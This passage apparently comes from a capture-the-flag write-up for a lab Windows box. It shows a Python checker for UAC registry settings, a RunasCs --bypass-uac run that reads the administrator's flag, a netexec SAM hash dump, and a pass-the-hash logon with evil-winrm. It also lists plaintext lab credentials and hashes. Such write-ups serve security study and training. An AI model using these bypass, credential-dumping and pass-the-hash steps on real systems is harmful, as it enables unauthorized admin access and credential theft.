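    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1].startswith("REG_"):
            values[parts[0]] = (parts[1], parts[2] if len(parts) > 2 else None)
    return values


def dword(values: Dict[str, Tuple[str, Optional[str]]], name: str, default: int) -> int:
    """reg query prints DWORDs as hex (0x5). A missing value means the Windows
    default applies, which the caller supplies."""
    entry = values.get(name)
    if entry is None or entry[1] is None:
        return default
    return int(entry[1], 0)


def assess_uac(text: str) -> Dict[str, object]:
    values = parse_reg_query(text)
    findings: List[str] = []
    enable_lua = dword(values, "EnableLUA", 1)
    token_filter = dword(values, "LocalAccountTokenFilterPolicy", 0)
    if enable_lua == 0:
        findings.append("EnableLUA=0: UAC is off, every admin logon gets a full token")
    if dword(values, "ConsentPromptBehaviorAdmin", 5) == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: admins elevate without any prompt")
    if dword(values, "PromptOnSecureDesktop", 1) == 0:
        findings.append("PromptOnSecureDesktop=0: consent prompt not isolated from other processes")
    if token_filter == 1:
        findings.append("LocalAccountTokenFilterPolicy=1: local admins get unfiltered tokens "
                        "over the network (a pass-the-hash logon lands as full admin)")
    return {
        "uac_enabled": enable_lua == 1,
        # Documented default: with UAC on and the filter policy unset/0, a
        # non-RID-500 local admin connecting remotely receives a filtered token.
        "remote_local_admins_filtered": enable_lua == 1 and token_filter == 0,
        "findings": findings,
    }


if __name__ == "__main__":
    print(assess_uac(REG_OUTPUT_MAILING))
    print(assess_uac(REG_OUTPUT_WEAK))
```

The box's own values come back clean (UAC on, consent prompt on the secure desktop, remote local admins filtered), which is why simply being added to Administradores does not hand the session an elevated token.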

We still don't have direct access to the localadmin directory because UAC is in place: maya is now in Administradores, but our session isn't running elevated. We can use the RunasCs tool with --bypass-uac to execute any command with an elevated admin token.

*Evil-WinRM* PS C:\Users\maya> cd $ENV:TEMP
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> upload rc.exe
*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c dir /Users/localadmin" --bypass-uac
    Directory: C:\Users\localadmin

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        2024-03-03   4:40 PM                .dotnet
d-r---        2024-02-27   4:30 PM                3D Objects
d-r---        2024-02-27   4:30 PM                Contacts
d-r---        2024-04-12   6:10 AM                Desktop
d-r---        2024-03-14   3:39 PM                Documents
d-r---        2024-04-30   9:14 AM                Downloads
d-r---        2024-02-27   4:30 PM                Favorites
d-r---        2024-02-27   4:30 PM                Links
d-r---        2024-02-27   4:30 PM                Music
d-r---        2024-02-27   4:32 PM                OneDrive
d-r---        2024-02-27   4:32 PM                Pictures
d-r---        2024-02-27   4:30 PM                Saved Games
d-r---        2024-02-27   4:31 PM                Searches
d-r---        2024-03-05   3:37 PM                Videos

*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c dir /Users/localadmin/Desktop" --bypass-uac
    Directory: C:\Users\localadmin\Desktop
    
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        2024-02-27   4:30 PM           2350 Microsoft Edge.lnk
-ar---        2024-05-12  12:58 PM             34 root.txt

*Evil-WinRM* PS C:\Users\maya\AppData\Local\Temp> .\rc.exe maya m4y4ngs4ri "powershell -c type /Users/localadmin/Desktop/root.txt" --bypass-uac
c7fd0ef937dc6923ac5ba902c202251d

Method 2

Dump the SAM hashes and log in to the machine with pass-the-hash:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ netexec smb 10.10.11.14 -u maya -p m4y4ngs4ri --sam
SMB         10.10.11.14     445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14     445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.10.11.14     445    MAILING          [*] Dumping SAM hashes
SMB         10.10.11.14     445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14     445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14     445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14     445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.10.11.14     445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.10.11.14     445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.10.11.14     445    MAILING          [+] Added 6 SAM hashes to the database

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Mailing]
└─$ evil-winrm -i 10.10.11.14 -u localadmin -H 9aa582783780d1546d62f2d102daefae

Evil-WinRM shell v3.5

*Evil-WinRM* PS C:\Users\localadmin\Documents> whoami
mailing\localadmin
*Evil-WinRM* PS C:\Users\localadmin\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\localadmin\Desktop> cat root.txt
c7fd0ef937dc6923ac5ba902c202251d

Since we have admin access, we could probably use any of the techniques from: https://www.netexec.wiki/smb-protocol/obtaining-credentials
